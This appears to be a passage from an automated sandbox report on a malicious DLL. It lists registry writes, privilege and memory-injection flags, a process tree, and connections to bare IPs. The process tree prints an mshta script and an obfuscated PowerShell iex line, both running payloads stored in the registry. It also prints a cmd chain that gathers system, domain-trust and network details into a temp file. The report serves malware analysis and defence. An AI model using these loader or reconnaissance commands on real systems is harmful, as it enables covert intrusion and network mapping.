6700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36643633633635313661653161376534306565613635646130326465313638363932656235633366316266343466393730363338353863333139386530313731000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645e77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645e77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 = 8c676aa652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ca6057-baf0-4b43-a = 3eaaa8a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c5660f14-860c-4e81-9 = 0f69c8a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dddedab3-0d57-46a6-8 = e5157fa852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\51143b95-e0b2-4c00-a | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d62eb4a-b3b9-4465-8 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = 4f3b44a852a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\89e438a32df92b68baa99a7b1f853e9c5016ac2f42d270dcdb0f22cca0d53f2e" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\da74b967-1d72-46d1-a = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000024ed60a752a7d801af8c9ca752a7d801af8c9ca752a7d8017aa10b000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000386231656133646166646331313338306235306237636237313934303836386439663063613365313537383235336564333634373230343837383830366438660000b20009000400efbe03558280035582802e0000000000000000000000000000000000000000000000000002598e00380062003100650061003300640061006600640063003100310033003800300062003500300062003700630062003700310039003400300038003600380064003900660030006300610033006500310035003700380032003500330065006400330036003400370032003000340038003700380038003000360064003800660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c38623165613364616664633131333830623530623763623731393430383638643966306361336531353738323533656433363437323034383738383036643866000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8646077a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8646077a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d9c3e5cc-f402-4e80-9 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b26a4060-92d1-4d12-b = 127f80a652a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\084ec861-8ea3-4666-8 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a47e7349-31b8-48b4-9 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000d82b1ea752a7d80159d8aaa752a7d80159d8aaa752a7d8014aae0d000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000035582802000393332313463656439373862316633666135633337626465356161373133303261303763613265393436396233373063633131626336313933303830336266330000b20009000400efbe03558280035582802e0000000000000000000000000000000000000000000000000076688200390033003200310034006300650064003900370038006200310066003300660061003500630033003700620064006500350061006100370031003300300032006100300037006300610032006500390034003600390062003300370030006300630031003100620063003600310039003300300038003000330062006600330000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000004dfc161e1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c39333231346365643937386231663366613563333762646535616137313330326130376361326539343639623337306363313162633631393330383033626633000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006c6e7966676568690000000000000000387ed046496cf24ab3ec677917a3d8645a77a322e008ed119262726f482620df387ed046496cf24ab3ec677917a3d8645a77a322e008ed119262726f482620dfce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002d00000053002d0031002d0035002d00320031002d0032003600360030003300300038003700370036002d0033003700300035003100350030003000380036002d00320036003500390033003500310035002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d00000068000000004800000024aabe40000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\11f92fce-4a7d-4556-a = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13cad353-7f43-49c5-b = "\\\\?\\Volume{40BEAA24-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\6d63c6516ae1a7e40eea65da02de168692eb5c3f1bf44f97063858c3198e0171" | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\de00c4750accf516704b8c0df265c24a.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Shab='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Shab).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nttbepxbbx -value gp; new-alias -name apawnvggm -value iex; apawnvggm ([System.Text.Encoding]::ASCII.GetString((nttbepxbbx "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F40.tmp" "c:\Users\Admin\AppData\Local\Temp\ah5igeoc\CSC24D500C657934025B3BFB861A4C63B85.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jfroacpp\jfroacpp.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FDC.tmp" "c:\Users\Admin\AppData\Local\Temp\jfroacpp\CSC9430E91D549343849319CE1EE7C3E4DD.TMP"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\6602.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\6602.bin1 > C:\Users\Admin\AppData\Local\Temp\6602.bin & del C:\Users\Admin\AppData\Local\Temp\6602.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| IE | 13.69.239.72:443 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 209.197.3.8:80 | tcp | |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/1816-130-0x0000000000000000-mapping.dmp
memory/1816-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1816-136-0x0000000000CD0000-0x0000000000CDD000-memory.dmp
memory/3932-140-0x0000000000000000-mapping.dmp
memory/3932-141-0x000001CF6D940000-0x000001CF6D962000-memory.dmp
memory/3932-142-0x00007FFBF9490000-0x00007FFBF9F51000-memory.dmp
memory/516-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ah5igeoc\ah5igeoc.cmdline
| MD5 | f2734214002408a7eccd2fbae5870da5 |
